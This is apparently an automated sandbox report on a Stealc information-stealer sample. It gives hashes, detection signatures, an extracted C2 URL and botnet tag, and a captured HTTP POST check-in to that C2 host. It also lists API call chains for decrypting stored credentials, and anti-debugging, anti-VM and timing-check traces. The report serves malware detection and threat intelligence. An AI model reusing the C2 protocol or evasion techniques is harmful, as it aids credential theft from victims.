
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1540505
MD5: de1624f6c5d98d559c64c9c30359b942
SHA1: b02c82eeb4d1e7b768633ef276f182b653db29fc
SHA256: 3a98e0f2785d57188cab067e1c48a2355d69212f432380d94315db75d1be30ce
Tags: exe user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 6448 cmdline: "C:\Users\user\Desktop\file.exe" MD5: DE1624F6C5D98D559C64C9C30359B942)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development draws on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security

Source | Rule | Description | Author | Strings
00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.1291738753.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000003.1251438236.0000000005340000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 6448 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 6448 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

Source | Rule | Description | Author | Strings
0.2.file.exe.fb0000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-23T20:55:05.940663+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49699 | 185.215.113.37 | 80 | TCP

AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: 0.2.file.exe.fb0000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: file.exe | ReversingLabs: Detection: 47%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FBC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat | 0_2_00FBC820
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree | 0_2_00FB9AC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree | 0_2_00FB7240
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB9B60 CryptUnprotectData,LocalAlloc,LocalFree | 0_2_00FB9B60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FC8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA | 0_2_00FC8EA0
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FC38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose | 0_2_00FC38B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FC4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00FC4910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FBDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose | 0_2_00FBDA80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FBE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA | 0_2_00FBE430
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FC4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen | 0_2_00FC4570
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FBED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose | 0_2_00FBED20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00FB16D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FBF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00FBF6B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FC3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose | 0_2_00FC3EA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FBBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose | 0_2_00FBBE70
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FBDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00FBDE10

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49699 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected:
  GET / HTTP/1.1
  Host: 185.215.113.37
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
  POST /e2b1563c6670f193.php HTTP/1.1
  Content-Type: multipart/form-data; boundary=----IDBKKKKKFBGDGDHIDBGH
  Host: 185.215.113.37
  Content-Length: 211
  Connection: Keep-Alive
  Cache-Control: no-cache
  Data Raw: 2d 2d 2d 2d 2d 2d 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 44 31 38 30 31 45 34 43 42 37 42 31 39 35 33 34 34 38 30 31 39 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 48 2d 2d 0d 0a
  Data Ascii:
    ------IDBKKKKKFBGDGDHIDBGH
    Content-Disposition: form-data; name="hwid"

    CD1801E4CB7B1953448019
    ------IDBKKKKKFBGDGDHIDBGH
    Content-Disposition: form-data; name="build"

    doma
    ------IDBKKKKKFBGDGDHIDBGH--
Source: Joe Sandbox View | IP Address: 185.215.113.37 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle | 0_2_00FB4880
Source: global traffic | HTTP traffic detected:
  GET / HTTP/1.1
  Host: 185.215.113.37
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: unknown | HTTP traffic detected:
  POST /e2b1563c6670f193.php HTTP/1.1
  Content-Type: multipart/form-data; boundary=----IDBKKKKKFBGDGDHIDBGH
  Host: 185.215.113.37
  Content-Length: 211
  Connection: Keep-Alive
  Cache-Control: no-cache
  Data Raw: 2d 2d 2d 2d 2d 2d 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 44 31 38 30 31 45 34 43 42 37 42 31 39 35 33 34 34 38 30 31 39 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 48 2d 2d 0d 0a
  Data Ascii:
    ------IDBKKKKKFBGDGDHIDBGH
    Content-Disposition: form-data; name="hwid"

    CD1801E4CB7B1953448019
    ------IDBKKKKKFBGDGDHIDBGH
    Content-Disposition: form-data; name="build"

    doma
    ------IDBKKKKKFBGDGDHIDBGH--
Source: file.exe, 00000000.00000002.1291738753.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1291738753.0000000000E2C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1291738753.0000000000E2C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/3O
Source: file.exe, 00000000.00000002.1291738753.0000000000E2C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1291738753.0000000000E43000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php$
Source: file.exe, 00000000.00000002.1291738753.0000000000E2C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php8_Tv
Source: file.exe, 00000000.00000002.1291738753.0000000000E2C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpD_
Source: file.exe, 00000000.00000002.1291738753.0000000000E2C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpX_
Source: file.exe, 00000000.00000002.1291738753.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37g

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01353155 | 0_2_01353155
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0139495D | 0_2_0139495D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0137C1A9 | 0_2_0137C1A9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012321D7 | 0_2_012321D7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0138C30F | 0_2_0138C30F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01391345 | 0_2_01391345
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01388B92 | 0_2_01388B92
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01399A11 | 0_2_01399A11
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0139640C | 0_2_0139640C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0139B46D | 0_2_0139B46D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0139CF04 | 0_2_0139CF04
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01308F69 | 0_2_01308F69
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013C97A0 | 0_2_013C97A0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0139EFCE | 0_2_0139EFCE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0138DE5C | 0_2_0138DE5C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0138A6AF | 0_2_0138A6AF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01392EA0 | 0_2_01392EA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013876A7 | 0_2_013876A7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01397EC2 | 0_2_01397EC2
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00FB45C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: sacriosm ZLIB complexity 0.9950929799139691
Source: file.exe | Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: file.exe, 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1251438236.0000000005340000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FC8680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle | 0_2_00FC8680
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FC3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn | 0_2_00FC3720
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\XCLHRD0D.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | ReversingLabs: Detection: 47%
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: file.exe | Static file information: File size 1911808 > 1048576
Source: file.exe | Static PE information: Raw size of sacriosm is bigger than: 0x100000 < 0x1aca00

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.fb0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;sacriosm:EW;bxtvqvzl:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;sacriosm:EW;bxtvqvzl:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FC9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00FC9860
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1d7b34 should be: 0x1d67c6
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: sacriosm
Source: file.exe | Static PE information: section name: bxtvqvzl
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013D712C push 5B4551ACh; mov dword ptr [esp], edx | 0_2_013D714E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013C9104 push 213D8DF4h; mov dword ptr [esp], esi | 0_2_013C9128
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01484177 push 15970855h; mov dword ptr [esp], edx | 0_2_0148419B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013BF96E push 36287A32h; mov dword ptr [esp], eax | 0_2_013BF9AC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012E0176 push 1F82D150h; mov dword ptr [esp], ebx | 0_2_012E0197
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012E0176 push eax; mov dword ptr [esp], 7FBFBD57h | 0_2_012E01B8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01353155 push ebp; mov dword ptr [esp], eax | 0_2_01353159
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01353155 push edi; mov dword ptr [esp], 79F31B78h | 0_2_0135317D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0139495D push edx; mov dword ptr [esp], 6E185FC6h | 0_2_01394965
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0139495D push 3DCA8B7Ah; mov dword ptr [esp], ebp | 0_2_013949E5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0139495D push edx; mov dword ptr [esp], eax | 0_2_01394A94
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0139495D push 08AC2DEBh; mov dword ptr [esp], ebx | 0_2_01394AD4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0139495D push ebp; mov dword ptr [esp], edi | 0_2_01394B8B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0139495D push ebp; mov dword ptr [esp], ebx | 0_2_01394BBE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0139495D push 0A3B321Eh; mov dword ptr [esp], esi | 0_2_01394BC6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0139495D push edx; mov dword ptr [esp], 77267F43h | 0_2_01394BE3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0139495D push 3094F9BDh; mov dword ptr [esp], ecx | 0_2_01394C77
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0139495D push 283F7A17h; mov dword ptr [esp], edi | 0_2_01394CF9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0139495D push ebp; mov dword ptr [esp], 6F6BAF96h | 0_2_01394D2D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0139495D push ebx; mov dword ptr [esp], 3146EFC7h | 0_2_01394D93
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0139495D push ebx; mov dword ptr [esp], ecx | 0_2_01394D9E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0139495D push eax; mov dword ptr [esp], edi | 0_2_01394E13
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0139495D push 07BD69AFh; mov dword ptr [esp], ecx | 0_2_01394EA3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0139495D push 0876BF65h; mov dword ptr [esp], edx | 0_2_01394EF7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0139495D push 200EFB96h; mov dword ptr [esp], esi | 0_2_01394F08
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0139495D push ebx; mov dword ptr [esp], 3A85B921h | 0_2_01394F47
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0139495D push ebx; mov dword ptr [esp], ebp | 0_2_01394F80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0139495D push 76D46DF6h; mov dword ptr [esp], edi | 0_2_01394FA1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0139495D push esi; mov dword ptr [esp], ecx | 0_2_01394FA7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0139495D push ecx; mov dword ptr [esp], edi | 0_2_01394FAB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0139495D push ebp; mov dword ptr [esp], edx | 0_2_013950E8
Source: file.exe | Static PE information: section name: sacriosm entropy: 7.954815877107788

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FC9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00FC9860

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-13572
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1211961, second address: 121196C | instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A6146, second address: 13A614C | instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A614C, second address: 13A6150 | instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A50B9, second address: 13A50C6 | instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A50C6, second address: 13A50CB | instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A525B, second address: 13A525F | instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A525F, second address: 13A526B | instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A53C6, second address: 13A53CA | instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A53CA, second address: 13A53D0 | instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A53D0, second address: 13A53FA | instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2A68BE4F4Eh 0x00000008 jl 00007F2A68BE4F46h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F2A68BE4F56h 0x00000019 rdtsc
